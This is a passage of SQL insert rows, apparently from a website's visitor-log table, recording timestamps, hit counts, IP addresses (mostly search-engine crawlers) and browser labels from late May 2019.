1,0,0,'95.108.213.4','other'),(423052,1558882640,2,2,0,0,'40.77.167.135','other'),(423053,1558882731,1,1,0,0,'40.77.167.21','other'),(423054,1558883213,1,1,0,0,'157.55.39.214','other'),(423055,1558883891,1,1,0,0,'95.163.255.97','other'),(423056,1558883893,1,1,0,0,'87.250.224.118','other'),(423057,1558883903,1,1,0,0,'178.154.171.24','other'),(423058,1558883918,2,2,0,0,'178.154.244.11','other'),(423059,1558884040,1,1,0,0,'141.8.142.144','other'),(423060,1558884043,1,1,0,0,'87.250.224.81','other'),(423061,1558884053,1,1,0,0,'95.108.181.75','other'),(423062,1558884107,1,1,0,0,'37.9.113.148','other'),(423063,1558884492,1,1,0,0,'157.55.39.187','other'),(423064,1558884550,1,1,0,0,'40.77.167.135','other'),(423065,1558885413,1,1,0,0,'95.108.181.54','other'),(423066,1558886761,1,1,0,0,'157.55.39.211','other'),(423067,1558888002,1,1,0,0,'178.154.244.11','other'),(423068,1558888071,1,1,0,0,'5.45.207.79','other'),(423069,1558888235,1,1,0,0,'95.163.255.151','other'),(423070,1558888616,1,1,0,0,'5.45.207.19','other'),(423071,1558888880,1,1,0,0,'91.196.178.103','chrome'),(423072,1558888908,1,1,0,0,'141.8.142.103','other'),(423073,1558888925,1,1,0,0,'95.163.255.191','other'),(423074,1558889225,1,1,0,0,'66.249.66.218','chrome'),(423075,1558889359,1,1,0,0,'66.249.66.220','chrome'),(423076,1558889402,2,2,0,0,'8.29.198.27','other'),(423077,1558889495,1,1,0,0,'95.163.255.98','other'),(423078,1558889507,1,1,0,0,'31.184.238.175','chrome'),(423079,1558889546,1,1,0,0,'66.249.66.130','chrome'),(423080,1558890669,1,1,0,0,'66.249.66.218','chrome'),(423081,1558890745,1,1,0,0,'40.77.167.126','other'),(423082,1558890885,2,2,0,0,'157.55.39.211','other'),(423083,1558891792,2,2,0,0,'66.249.66.220','chrome'),(423084,1558891959,1,1,0,0,'178.154.244.11','other'),(423085,1558892000,1,1,0,0,'66.249.66.222','chrome'),(423086,1558892131,1,1,0,0,'157.55.39.186','other'),(423087,1558892164,1,1,0,0,'66.249.66.128','chrome'),(423088,1558892272,1,1,0,0,'141.8.132.16','other'),(423089,1558892296,1,1,0,0,'37.9.113.20','other'),(423090,1558892312,1,1,0,0,'141.8.142.144','other'),(423091,1558892520,1,1,0,0,'40.77.167.126','other'),(423092,1558892527,1,1,0,0,'95.163.255.171','other'),(423093,1558892627,1,1,0,0,'66.249.66.218','chrome'),(423094,1558893378,1,1,0,0,'157.55.39.147','other'),(423095,1558893460,1,1,0,0,'66.249.66.220','chrome'),(423096,1558893617,1,1,0,0,'130.180.217.176','chrome'),(423097,1558894182,1,1,0,0,'40.77.167.126','other'),(423098,1558895301,1,1,0,0,'95.163.255.92','other'),(423099,1558895498,1,1,0,0,'176.9.9.94','other'),(423100,1558896241,2,2,0,0,'66.249.66.220','chrome'),(423101,1558896271,1,1,0,0,'157.55.39.156','other'),(423102,1558896356,1,1,0,0,'66.249.66.222','chrome'),(423103,1558896784,1,1,0,0,'213.180.203.9','other'),(423104,1558896840,1,1,0,0,'157.55.39.147','other'),(423105,1558897204,1,1,0,0,'95.108.213.4','other'),(423106,1558897382,1,1,0,0,'40.77.167.126','other'),(423107,1558897466,1,1,0,0,'87.250.224.47','other'),(423108,1558898367,1,1,0,0,'66.249.66.222','chrome'),(423109,1558899258,1,1,0,0,'66.249.66.128','chrome'),(423110,1558899267,1,1,0,0,'95.163.255.97','other'),(423111,1558899300,2,2,0,0,'141.8.183.23','other'),(423112,1558899342,2,2,0,0,'66.249.66.218','chrome'),(423113,1558899346,1,1,0,0,'5.45.207.19','other'),(423114,1558899485,1,1,0,0,'178.154.171.24','other'),(423115,1558899512,1,1,0,0,'40.77.167.125','other'),(423116,1558899959,1,1,0,0,'95.163.255.166','other'),(423117,1558900238,1,1,0,0,'8.29.198.27','other'),(423118,1558900398,1,1,0,0,'66.249.66.132','chrome'),(423119,1558900619,1,1,0,0,'8.29.198.26','other'),(423120,1558901005,1,1,0,0,'95.163.255.95','other'),(423121,1558901317,2,2,0,0,'66.249.66.222','chrome'),(423122,1558901874,2,2,0,0,'188.166.116.151','chrome'),(423123,1558902963,2,2,0,0,'5.45.207.79','other'),(423124,1558903020,1,1,0,0,'66.249.66.218','chrome'),(423125,1558903128,1,1,0,0,'66.249.66.222','chrome'),(423126,1558903185,1,1,0,0,'66.249.66.220','chrome'),(423127,1558903216,1,1,0,0,'66.102.9.62','chrome'),(423128,1558904434,1,1,0,0,'157.55.39.108','other'),(423129,1558904999,1,1,0,0,'207.46.13.78','other'),(423130,1558905234,1,1,0,0,'66.249.66.128','chrome'),(423131,1558906401,2,2,0,0,'178.154.244.11','other'),(423132,1558906422,1,1,0,0,'66.249.66.222','chrome'),(423133,1558906477,2,2,0,0,'5.45.207.79','other'),(423134,1558906726,1,1,0,0,'66.249.66.128','chrome'),(423135,1558907017,1,1,0,0,'95.163.255.92','other'),(423136,1558907460,1,1,0,0,'66.249.66.130','chrome'),(423137,1558907548,1,1,0,0,'66.249.66.218','chrome'),(423138,1558908578,1,1,0,0,'95.163.255.189','other'),(423139,1558909115,1,1,0,0,'157.55.39.147','other'),(423140,1558909489,2,2,0,0,'178.154.244.11','other'),(423141,1558909837,1,1,0,0,'66.249.66.218','chrome'),(423142,1558910767,1,1,0,0,'66.249.66.130','chrome'),(423143,1558911079,1,1,0,0,'8.29.198.27','other'),(423144,1558911329,1,1,0,0,'66.249.66.220','chrome'),(423145,1558911449,1,1,0,0,'8.29.198.25','other'),(423146,1558911450,1,1,0,0,'66.249.66.218','chrome'),(423147,1558912038,1,1,0,0,'157.55.39.169','other'),(423148,1558912401,1,1,0,0,'66.249.66.132','chrome'),(423149,1558912431,1,1,0,0,'141.8.142.38','other'),(423150,1558912612,1,1,0,0,'95.163.255.97','other'),(423151,1558912855,2,2,0,0,'157.55.39.108','other'),(423152,1558913650,1,1,0,0,'66.249.66.218','chrome'),(423153,1558914420,1,1,0,0,'207.46.13.54','other'),(423154,1558915779,1,1,0,0,'66.249.66.132','chrome'),(423155,1558916098,1,1,0,0,'66.249.66.218','chrome'),(423156,1558917527,1,1,0,0,'157.55.39.169','other'),(423157,1558918014,1,1,0,0,'66.249.66.218','chrome'),(423158,1558918310,2,2,0,0,'66.249.66.222','chrome'),(423159,1558918577,1,1,0,0,'66.249.66.220','chrome'),(423160,1558918640,1,1,0,0,'66.249.66.132','chrome'),(423161,1558918890,1,1,0,0,'95.108.213.4','other'),(423162,1558918970,1,1,0,0,'66.249.66.130','chrome'),(423163,1558919467,1,1,0,0,'109.201.154.137','other'),(423164,1558919480,1,1,0,0,'46.166.188.249','other'),(423166,1558920164,1,1,0,0,'207.46.13.54','other'),(423167,1558920257,1,1,0,0,'66.249.66.222','chrome'),(423168,1558921045,1,1,0,0,'157.55.39.108','other'),(423169,1558921294,1,1,0,0,'66.249.66.220','chrome'),(423170,1558921363,1,1,0,0,'66.249.66.222','chrome'),(423171,1558921666,2,2,0,0,'66.249.66.218','chrome'),(423172,1558921826,1,1,0,0,'95.108.181.54','other'),(423173,1558921915,1,1,0,0,'8.29.198.26','other'),(423174,1558921920,1,1,0,0,'178.154.244.49','other'),(423175,1558922035,1,1,0,0,'40.77.167.64','other'),(423176,1558922287,1,1,0,0,'8.29.198.27','other'),(423177,1558922410,2,2,0,0,'66.249.66.220','chrome'),(423178,1558922620,1,1,0,0,'40.77.167.4','other'),(423179,1558924118,1,1,0,0,'207.46.13.64','other'),(423180,1558924398,1,1,0,0,'5.45.207.79','other'),(423181,1558924779,1,1,0,0,'66.249.66.130','chrome'),(423182,1558925102,1,1,0,0,'157.55.39.169','other'),(423183,1558925281,1,1,0,0,'66.249.66.220','chrome'),(423184,1558925538,1,1,0,0,'207.46.13.64','other'),(423185,1558926471,1,1,0,0,'66.249.66.218','chrome'),(423186,1558926790,1,1,0,0,'40.77.167.83','other'),(423187,1558927559,1,0,1,0,'66.249.66.218',''),(423188,1558927923,3,3,0,0,'66.249.66.218','chrome'),(423189,1558928231,1,1,0,0,'207.46.13.64','other'),(423190,1558928690,1,1,0,0,'66.249.66.130','chrome'),(423191,1558928803,3,3,0,0,'66.249.66.220','chrome'),(423192,1558928864,2,2,0,0,'52.12.135.124','chrome'),(423193,1558928908,1,1,0,0,'213.180.203.40','other'),(423194,1558929070,1,1,0,0,'66.249.66.128','chrome'),(423195,1558929082,1,1,0,0,'66.249.66.218','chrome'),(423196,1558929488,1,1,0,0,'40.77.167.83','other'),(423197,1558929684,1,1,0,0,'141.8.142.103','other'),(423198,1558929980,1,1,0,0,'66.249.66.128','chrome'),(423199,1558930094,1,1,0,0,'95.163.255.97','other'),(423200,1558930406,1,1,0,0,'66.249.66.218','chrome'),(423201,1558930485,1,1,0,0,'66.249.66.222','chrome'),(423202,1558930742,1,1,0,0,'40.77.167.83','other'),(423203,1558930893,1,1,0,0,'46.166.137.194','other'),(423204,1558931927,1,1,0,0,'66.249.66.222','chrome'),(423205,1558932049,1,1,0,0,'66.249.66.218','chrome'),(423206,1558932132,1,1,0,0,'66.249.66.220','chrome'),(423207,1558932752,2,2,0,0,'8.29.198.27','other'),(423208,1558932790,1,1,0,0,'207.46.13.64','other'),(423209,1558933350,1,1,0,0,'40.77.167.4','other'),(423210,1558933587,1,1,0,0,'95.108.181.96','other'),(423211,1558933640,1,1,0,0,'5.255.253.38','other'),(423212,1558933755,1,1,0,0,'178.154.200.48','other'),(423213,1558934188,1,1,0,0,'66.249.66.218','chrome'),(423214,1558934267,1,1,0,0,'66.249.66.222','chrome'),(423215,1558934288,1,1,0,0,'87.250.224.118','other'),(423216,1558934313,1,1,0,0,'5.58.3.110','firefox'),(423217,1558934388,1,1,0,0,'176.8.91.216','chrome'),(423218,1558934839,1,1,0,0,'185.220.101.45','other'),(423219,1558935003,1,1,0,0,'66.249.66.220','chrome'),(423220,1558935510,1,1,0,0,'66.249.66.222','chrome'),(423221,1558935531,1,1,0,0,'178.154.244.65','other'),(423222,1558936182,1,1,0,0,'141.8.132.16','other'),(423223,1558936185,1,1,0,0,'141.8.142.191','other'),(423224,1558937058,1,1,0,0,'5.45.207.19','other'),(423225,1558937172,1,1,0,0,'66.249.66.220','chrome'),(423226,1558937208,2,2,0,0,'40.77.167.83','other'),(423227,1558938198,2,2,0,0,'66.249.66.220','chrome'),(423228,1558939019,1,1,0,0,'141.8.142.162','other'),(423229,1558939197,1,1,0,0,'5.45.207.19','other'),(423230,1558939239,1,1,0,0,'87.250.224.64','other'),(423231,1558939461,1,1,0,0,'66.249.66.218','chrome'),(423232,1558940107,1,1,0,0,'157.55.39.252','other'),(423233,1558940202,1,1,0,0,'141.8.183.23','other'),(423234,1558940846,3,3,0,0,'66.249.66.218','chrome'),(423235,1558941495,1,1,0,0,'66.249.66.220','chrome'),(423236,1558941622,1,1,0,0,'91.196.178.89','chrome'),(423237,1558941996,1,1,0,0,'66.249.66.132','chrome'),(423238,1558942648,1,1,0,0,'207.46.13.64','other'),(423239,1558942860,1,1,0,0,'141.8.183.23','other'),(423240,1558943058,1,1,0,0,'66.249.66.130','chrome'),(423241,1558943124,1,1,0,0,'40.77.167.68','other'),(423242,1558943603,2,2,0,0,'8.29.198.25','other'),(423243,1558944132,2,2,0,0,'207.46.13.64','other'),(423244,1558944190,1,1,0,0,'207.46.13.247','other'),(423245,1558944702,1,1,0,0,'66.249.66.222','chrome'),(423246,1558944840,1,1,0,0,'213.180.203.9','other'),(423247,1558944970,1,1,0,0,'87.250.224.47','other'),(423248,1558945009,1,1,0,0,'91.196.177.46','firefox'),(423249,1558945897,1,1,0,0,'207.46.13.247','other'),(423250,1558947046,1,1,0,0,'207.46.13.247','other'),(423251,1558947857,1,1,0,0,'95.221.51.176','msie'),(423252,1558948050,1,1,0,0,'5.45.207.19','other'),(423253,1558948234,1,1,0,0,'141.8.142.103','other'),(423254,1558948666,1,1,0,0,'130.180.217.252','chrome'),(423255,1558950459,1,1,0,0,'82.145.211.215','other'),(423256,1558950739,1,1,0,0,'157.55.39.56','other'),(423257,1558951110,1,1,0,0,'5.45.207.19','other'),(423258,1558951144,2,2,0,0,'141.8.142.103','other'),(423259,1558951264,1,1,0,0,'95.108.213.4','other'),(423260,1558951292,1,1,0,0,'66.249.66.220','chrome'),(423261,1558952266,1,1,0,0,'109.74.154.72','chrome'),(423262,1558953179,1,1,0,0,'207.46.13.247','other'),(423263,1558953760,1,1,0,0,'66.249.66.222','chrome'),(423264,1558954176,1,1,0,0,'66.249.66.218','chrome'),(423265,1558954181,1,1,0,0,'66.249.66.220','chrome'),(423266,1558954443,2,2,0,0,'8.29.198.27','other'),(423267,1558954786,2,2,0,0,'104.197.30.23','chrome'),(423268,1558954816,3,3,0,0,'104.197.11.86','chrome'),(423269,1558954952,1,1,0,0,'91.202.160.212','chrome'),(423270,1558955401,1,1,0,0,'66.249.66.222','chrome'),(423271,1558955567,1,1,0,0,'5.45.207.19','other'),(423272,1558955706,1,1,0,0,'207.46.13.247','other'),(423273,1558956190,1,1,0,0,'207.46.13.46','other'),(423274,1558956385,1,1,0,0,'66.249.66.222','chrome'),(423275,1558956720,1,1,0,0,'87.250.224.64','other'),(423276,1558956746,1,1,0,0,'157.55.39.170','other'),(423277,1558956778,1,1,0,0,'157.55.39.177','other'),(423278,1558957450,1,1,0,0,'180.76.15.14','other'),(423279,1558957596,1,1,0,0,'92.113.191.206','chrome'),(423280,1558957904,1,1,0,0,'95.163.255.92','other'),(423281,1558958006,1,1,0,0,'5.45.207.79','other'),(423282,1558958278,1,1,0,0,'66.249.66.218','chrome'),(423283,1558958282,2,2,0,0,'66.249.66.222','chrome'),(423284,1558958492,1,1,0,0,'207.46.13.46','other'),(423285,1558958554,1,1,0,0,'178.95.217.23','chrome'),(423286,1558958720,1,1,0,0,'178.154.244.11','other'),(423287,1558958797,1,1,0,0,'87.250.224.81','other'),(423288,1558958808,1,1,0,0,'213.180.203.40','other'),(423289,1558958829,1,1,0,0,'95.108.181.54','other'),(423290,1558958855,1,1,0,0,'87.250.224.47','other'),(423291,1558959449,1,1,0,0,'180.76.15.10','other'),(423292,1558959552,1,1,0,0,'91.196.177.46','firefox'),(423293,1558959629,2,2,0,0,'178.95.217.23','chrome'),(423294,1558959706,1,1,0,0,'66.249.66.220','chrome'),(423295,1558959900,2,2,0,0,'66.249.66.222','chrome'),(423296,1558960118,1,1,0,0,'46.171.250.225','chrome'),(423297,1558960691,1,1,0,0,'66.249.66.220','chrome'),(423298,1558961043,1,1,0,0,'5.45.207.8','other'),(423299,1558961049,1,1,0,0,'87.250.224.47','other'),(423300,1558961110,1,1,0,0,'141.8.142.108','other'),(423301,1558961165,1,1,0,0,'95.108.181.54','other'),(423302,1558961228,1,1,0,0,'178.154.244.11','other'),(423303,1558961474,1,1,0,0,'66.249.66.83','chrome'),(423304,1558961678,2,2,0,0,'66.249.66.220','chrome'),(423305,1558962442,1,1,0,0,'66.249.66.128','chrome'),(423306,1558962459,1,1,0,0,'66.249.66.218','chrome'),(423307,1558962837,3,3,0,0,'157.55.39.170','other'),(423308,1558963017,1,1,0,0,'66.249.66.220','chrome'),(423309,1558963624,1,1,0,0,'37.9.113.20','other'),(423310,1558963746,1,1,0,0,'95.108.213.4','other'),(423311,1558963994,1,1,0,0,'5.45.207.79','other'),(423312,1558964018,2,2,0,0,'157.55.39.177','other'),(423313,1558964264,1,1,0,0,'178.154.244.65','other'),(423314,1558964364,1,1,0,0,'37.9.113.148','other'),(423315,1558964648,1,1,0,0,'109.229.23.178','firefox'),(423316,1558964809,1,1,0,0,'66.249.66.220','chrome'),(423317,1558965309,2,2,0,0,'8.29.198.27','other'),(423318,1558965607,1,1,0,0,'207.46.13.46','other'),(423319,1558965918,1,1,0,0,'66.249.66.222','chrome'),(423320,1558966051,1,1,0,0,'141.8.142.103','other'),(423321,1558966078,1,1,0,0,'213.180.203.9','other'),(423322,1558966140,1,1,0,0,'66.249.66.220','chrome'),(423323,1558966159,1,1,0,0,'91.196.177.46','firefox'),(423324,1558966586,1,1,0,0,'37.9.113.103','other'),(423325,1558966887,1,1,0,0,'157.55.39.177','other'),(423326,1558967018,1,1,0,0,'157.55.39.170','other'),(423327,1558968750,1,1,0,0,'5.45.207.19','other'),(423328,1558969154,1,1,0,0,'213.3.29.239','chrome'),(423329,1558969319,1,1,0,0,'66.249.66.218','chrome'),(423330,1558969641,1,1,0,0,'66.249.66.128','chrome'),(423331,1558969745,1,1,0,0,'40.77.167.164','other'),(423332,1558970763,2,2,0,0,'178.255.215.94','other'),(423333,1558971074,1,1,0,0,'87.250.224.47','other'),(423334,1558971100,1,1,0,0,'5.45.207.19','other'),(423335,1558971217,1,1,0,0,'207.46.13.46','other'),(423336,1558971923,1,1,0,0,'40.77.167.164','other'),(423337,1558972061,1,1,0,0,'51.77.52.160','chrome'),(423338,1558972454,1,1,0,0,'66.249.66.218','chrome'),(423339,1558972700,1,1,0,0,'66.249.66.132','chrome'),(423340,1558972919,1,1,0,0,'66.249.66.220','chrome'),(423341,1558973654,1,1,0,0,'178.154.244.11','other'),(423342,1558973663,1,1,0,0,'40.77.167.164','other'),(423343,1558974071,1,1,0,0,'66.249.66.220','chrome'),(423344,1558975287,1,1,0,0,'207.46.13.46','other'),(423345,1558976163,2,2,0,0,'8.29.198.27','other'),(423346,1558976358,1,1,0,0,'66.249.66.222','chrome'),(423347,1558976497,1,1,0,0,'40.77.167.164','other'),(423348,1558977105,1,1,0,0,'90.175.140.167','firefox'),(423349,1558977612,1,1,0,0,'66.249.66.218','chrome'),(423350,1558978958,1,1,0,0,'66.249.66.220','chrome'),(423351,1558978976,1,1,0,0,'66.249.66.218','chrome'),(423352,1558979110,1,1,0,0,'66.249.66.222','chrome'),(423353,1558979946,1,1,0,0,'40.77.167.89','other'),(423354,1558980720,1,1,0,0,'40.77.167.168','other'),(423355,1558981466,1,1,0,0,'66.249.66.130','chrome'),(423356,1558981538,2,1,1,0,'66.249.66.220',''),(423357,1558982043,1,1,0,0,'66.249.66.220','chrome'),(423358,1558982903,1,1,0,0,'157.55.39.190','other'),(423359,1558983533,1,1,0,0,'141.8.142.103','other'),(423360,1558983615,3,3,0,0,'95.108.213.4','other'),(423361,1558983875,3,3,0,0,'91.196.178.92','firefox'),(423362,1558983956,1,1,0,0,'5.45.207.19','other'),(423363,1558984158,1,1,0,0,'66.249.66.222','chrome'),(423364,1558984180,1,1,0,0,'66.249.66.218','chrome'),(423365,1558984436,1,1,0,0,'178.154.244.11','other'),(423366,1558985101,1,0,1,0,'66.249.66.130',''),(423367,1558985605,1,1,0,0,'37.73.171.231','chrome'),(423368,1558985939,2,2,0,0,'95.213.141.126','opera'),(423369,1558987006,1,1,0,0,'8.29.198.27','other'),(423370,1558987318,1,1,0,0,'8.29.198.26','other'),(423371,1558987430,1,1,0,0,'157.55.39.250','other'),(423372,1558987500,1,1,0,0,'66.249.66.222','chrome'),(423373,1558989235,1,1,0,0,'66.249.66.218','chrome'),(423374,1558989321,1,1,0,0,'157.55.39.250','other'),(423375,1558989437,1,1,0,0,'66.249.66.130','chrome'),(423376,1558989608,1,1,0,0,'37.9.113.103','other'),(423377,1558989629,1,1,0,0,'47.92.242.20','other'),(423378,1558990035,2,2,0,0,'66.249.66.220','chrome'),(423379,1558990303,1,1,0,0,'109.201.152.249','other'),(423380,1558990445,1,1,0,0,'40.77.167.160','other'),(423381,1558990985,1,1,0,0,'66.249.66.222','chrome'),(423382,1558991041,1,1,0,0,'66.249.66.220','chrome'),(423383,1558991353,1,1,0,0,'207.46.13.1','other'),(423384,1558992048,1,1,0,0,'193.106.30.100','chrome'),(423385,1558992120,1,1,0,0,'66.249.66.218','chrome'),(423386,1558992366,1,1,0,0,'157.55.39.190','other'),(423387,1558992440,2,2,0,0,'178.154.244.11','other'),(423388,1558993044,1,1,0,0,'40.77.167.85','other'),(423389,1558993109,1,1,0,0,'95.163.255.93','other'),(423390,1558993137,2,2,0,0,'66.249.66.218','chrome'),(423391,1558993174,1,1,0,0,'66.249.66.222','chrome'),(423392,1558994044,1,1,0,0,'157.55.39.190','other'),(423393,1558994232,1,1,0,0,'37.55.56.65','chrome'),(423394,1558994331,1,1,0,0,'157.55.39.250','other'),(423395,1558994380,1,1,0,0,'40.77.167.91','other'),(423396,1558994462,1,1,0,0,'66.249.66.218','chrome'),(423397,1558994774,1,1,0,0,'66.249.66.222','chrome'),(423398,1558994845,1,1,0,0,'40.77.167.85','other'),(423399,1558995827,1,1,0,0,'207.46.13.1','other'),(423400,1558995928,1,1,0,0,'157.55.39.250','other'),(423401,1558996480,1,1,0,0,'193.70.34.209','chrome'),(423402,1558996559,1,1,0,0,'40.77.167.91','other'),(423403,1558996739,3,3,0,0,'66.249.66.218','chrome'),(423404,1558997254,1,1,0,0,'188.255.39.237','msie'),(423405,1558997802,1,1,0,0,'66.249.66.220','chrome'),(423406,1558997826,1,1,0,0,'66.249.66.218','chrome'),(423407,1558997843,1,1,0,0,'8.29.198.27','other'),(423408,1558998050,1,1,0,0,'66.249.66.222','chrome'),(423409,1558998153,1,1,0,0,'8.29.198.26','other'),(423410,1558999163,1,1,0,0,'207.46.13.1','other'),(423411,1558999190,1,1,0,0,'66.249.66.218','chrome'),(423412,1558999272,1,1,0,0,'66.249.66.220','chrome'),(423413,1558999463,1,1,0,0,'66.249.66.130','chrome'),(423414,1558999665,2,2,0,0,'5.45.207.19','other'),(423415,1558999785,1,1,0,0,'141.8.142.103','other'),(423416,1559000056,1,1,0,0,'207.46.13.65','other'),(423417,1559000167,1,1,0,0,'66.249.66.128','chrome'),(423418,1559000234,1,1,0,0,'66.249.66.222','chrome'),(423419,1559000492,1,1,0,0,'5.45.207.79','other'),(423420,1559000556,1,1,0,0,'178.154.244.11','other'),(423421,1559000736,1,1,0,0,'5.45.207.19','other'),(423422,1559000764,1,1,0,0,'157.55.39.250','other'),(423423,1559001208,1,1,0,0,'66.249.66.222','chrome'),(423424,1559001347,2,2,0,0,'40.77.167.91','other'),(423425,1559002065,1,1,0,0,'213.180.203.9','other'),(423426,1559002523,1,1,0,0,'5.188.210.52','chrome'),(423427,1559002573,1,1,0,0,'95.163.255.94','other'),(423428,1559002991,1,1,0,0,'207.46.13.65','other'),(423429,1559002995,1,1,0,0,'207.46.13.1','other'),(423430,1559003542,1,1,0,0,'5.45.207.8','other'),(423431,1559003604,1,1,0,0,'178.154.244.49','other'),(423432,1559003887,1,1,0,0,'40.77.167.91','other'),(423433,1559004210,1,1,0,0,'207.46.13.1','other'),(423434,1559004289,3,3,0,0,'66.249.66.218','chrome'),(423435,1559004338,1,1,0,0,'66.249.66.222','chrome'),(423436,1559004394,2,2,0,0,'207.46.13.215','other'),(423437,1559005240,1,1,0,0,'207.46.13.219','other'),(423438,1559005605,1,1,0,0,'66.249.66.218','chrome'),(423439,1559006138,1,1,0,0,'66.249.66.128','chrome'),(423440,1559006164,1,1,0,0,'5.45.207.19','other'),(423441,1559006976,1,1,0,0,'66.249.66.220','chrome'),(423442,1559008508,2,2,0,0,'5.45.207.79','other'),(423443,1559008537,1,1,0,0,'66.249.66.220','chrome'),(423444,1559008686,2,2,0,0,'8.29.198.27','other'),(423445,1559009154,2,2,0,0,'157.55.39.104','other'),(423446,1559009217,1,1,0,0,'66.249.66.130','chrome'),(423447,1559009896,1,1,0,0,'213.180.203.9','other'),(423448,1559010849,1,1,0,0,'95.108.213.4','other'),(423449,1559010955,1,1,0,0,'141.8.183.23','other'),(423450,1559011636,1,1,0,0,'207.46.13.219','other'),(423451,1559011701,1,1,0,0,'5.45.207.79','other'),(423452,1559013113,1,1,0,0,'213.180.203.9','other'),(423453,1559013215,1,1,0,0,'37.9.113.103','other'),(423454,1559013264,1,1,0,0,'207.46.13.1','other'),(423455,1559013356,1,1,0,0,'91.196.178.74','chrome'),(423456,1559013424,1,1,0,0,'66.249.66.218','chrome'),(423457,1559016302,1,1,0,0,'66.249.66.222','chrome'),(423458,1559016337,2,2,0,0,'157.55.39.104','other'),(423459,1559016624,1,1,0,0,'40.77.167.169','other'),(423460,1559016901,2,2,0,0,'35.166.88.112','chrome'),(423461,1559017921,1,1,0,0,'141.8.183.23','other'),(423462,1559017950,1,1,0,0,'178.154.244.65','other'),(423463,1559017979,1,1,0,0,'87.250.224.65','other'),(423464,1559017983,1,1,0,0,'87.250.224.81','other'),(423465,1559018000,1,1,0,0,'141.8.142.144','other'),(423466,1559018077,1,1,0,0,'37.9.113.148','other'),(423467,1559018790,1,1,0,0,'40.77.167.169','other'),(423468,1559019544,1,1,0,0,'8.29.198.25','other'),(423469,1559019837,1,1,0,0,'8.29.198.27','other'),(423470,1559019867,1,1,0,0,'66.249.66.128','chrome'),(423471,1559020148,1,1,0,0,'5.45.207.79','other'),(423472,1559020449,1,1,0,0,'66.249.66.218','chrome'),(423473,1559021161,1,1,0,0,'66.249.66.222','chrome'),(423474,1559021457,1,1,0,0,'157.55.39.104','other'),(423475,1559021493,1,1,0,0,'180.76.15.145','other'),(423476,1559022065,1,1,0,0,'66.249.66.218','chrome'),(423477,1559022208,1,1,0,0,'66.249.66.222','chrome'),(423478,1559022574,1,1,0,0,'157.55.39.104','other'),(423479,1559022700,1,1,0,0,'213.180.203.9','other'),(423480,1559022757,2,2,0,0,'141.8.142.103','other'),(423481,1559022805,1,1,0,0,'5.45.207.79','other'),(423482,1559023430,1,1,0,0,'66.102.7.216','chrome'),(423483,1559023494,1,1,0,0,'180.76.15.14','other'),(423484,1559023792,1,1,0,0,'66.249.66.220','chrome'),(423485,1559024679,1,1,0,0,'78.111.190.65','chrome'),(423486,1559024973,1,1,0,0,'37.9.113.148','other'),(423487,1559025081,1,1,0,0,'178.154.244.49','other'),(423488,1559025114,1,1,0,0,'178.154.244.21','other'),(423489,1559025199,1,1,0,0,'66.249.66.220','chrome'),(423490,1559025201,1,1,0,0,'157.55.39.79','other'),(423491,1559025432,2,2,0,0,'157.55.39.104','other'),(423492,1559025493,1,1,0,0,'180.76.15.151','other'),(423493,1559025779,1,1,0,0,'157.55.39.84','other'),(423494,1559026301,2,2,0,0,'66.249.66.218','chrome'),(423495,1559026429,2,2,0,0,'66.249.66.220','chrome'),(423496,1559026879,1,1,0,0,'66.249.66.132','chrome'),(423497,1559027021,1,1,0,0,'195.10.210.70','chrome'),(423498,1559027410,2,2,0,0,'37.9.113.103','other'),(423499,1559028136,1,1,0,0,'66.249.66.130','chrome'),(423500,1559028663,1,1,0,0,'66.249.66.218','chrome'),(423501,1559029089,1,1,0,0,'157.55.39.84','other'),(423502,1559029254,1,1,0,0,'178.255.215.94','other'),(423503,1559030164,1,1,0,0,'213.180.203.17','other'),(423504,1559030381,2,2,0,0,'8.29.198.25','other'),(423505,1559030762,1,1,0,0,'66.249.66.218','chrome'),(423506,1559031048,1,1,0,0,'66.249.66.130','chrome'),(423507,1559031940,1,1,0,0,'5.58.109.123','firefox'),(423508,1559032321,1,1,0,0,'66.249.66.130','chrome'),(423509,1559032371,1,1,0,0,'141.8.142.144','other'),(423510,1559032436,1,1,0,0,'66.249.66.222','chrome'),(423511,1559032891,1,1,0,0,'66.249.66.218','chrome'),(423512,1559033018,1,1,0,0,'141.8.183.23','other'),(423513,1559033838,1,1,0,0,'5.58.109.123','firefox'),(423514,1559034963,1,1,0,0,'62.80.185.138','chrome'),(423515,1559035015,2,2,0,0,'157.55.39.190','other'),(423516,1559035042,1,1,0,0,'66.102.9.28','chrome'),(423517,1559035562,1,1,0,0,'157.55.39.84','other'),(423518,1559036066,1,1,0,0,'178.154.244.49','other'),(423519,1559037090,2,2,0,0,'207.46.13.200','other'),(423520,1559037575,1,1,0,0,'95.108.181.54','other'),(423521,1559037632,1,1,0,0,'141.8.132.16','other'),(423522,1559037644,1,1,0,0,'87.250.224.118','other'),(423523,1559037803,1,1,0,0,'213.180.203.17','other'),(423524,1559037927,1,1,0,0,'46.211.103.20','chrome'),(423525,1559037987,1,1,0,0,'46.201.74.190','chrome'),(423526,1559038305,1,1,0,0,'66.249.66.220','chrome'),(423527,1559038354,2,2,0,0,'66.249.66.222','chrome'),(423528,1559038401,1,1,0,0,'157.55.39.190','other'),(423529,1559038629,1,1,0,0,'66.249.66.218','chrome'),(423530,1559038745,1,1,0,0,'210.57.57.162','chrome'),(423531,1559039122,1,1,0,0,'37.73.129.15','chrome'),(423532,1559039432,1,1,0,0,'188.163.102.232','firefox'),(423533,1559039531,2,2,0,0,'157.55.39.79','other'),(423534,1559039536,1,1,0,0,'109.74.154.72','chrome'),(423535,1559039570,1,1,0,0,'91.124.11.149','chrome'),(423536,1559040054,1,1,0,0,'66.249.66.218','chrome'),(423537,1559040094,1,1,0,0,'207.46.13.200','other'),(423538,1559041240,2,2,0,0,'8.29.198.26','other'),(423539,1559041278,3,3,0,0,'35.192.94.35','chrome'),(423540,1559041322,3,3,0,0,'35.224.32.84','chrome'),(423541,1559041336,5,5,0,0,'130.211.209.172','chrome'),(423542,1559041338,1,1,0,0,'66.249.66.222','chrome'),(423543,1559041581,1,1,0,0,'66.249.66.218','chrome'),(423544,1559041653,1,1,0,0,'40.77.167.37','other'),(423545,1559041748,1,1,0,0,'157.55.39.79','other'),(423546,1559042949,1,1,0,0,'66.249.66.128','chrome'),(423547,1559043054,4,4,0,0,'66.249.66.220','chrome'),(423548,1559043148,2,2,0,0,'66.249.66.218','chrome'),(423549,1559043199,1,1,0,0,'207.46.13.101','other'),(423550,1559043452,1,1,0,0,'178.154.244.49','other'),(423551,1559043455,1,1,0,0,'87.250.224.64','other'),(423552,1559043499,1,1,0,0,'213.180.203.17','other'),(423553,1559043505,1,1,0,0,'95.108.213.50','other'),(423554,1559043920,1,1,0,0,'66.249.66.222','chrome'),(423555,15590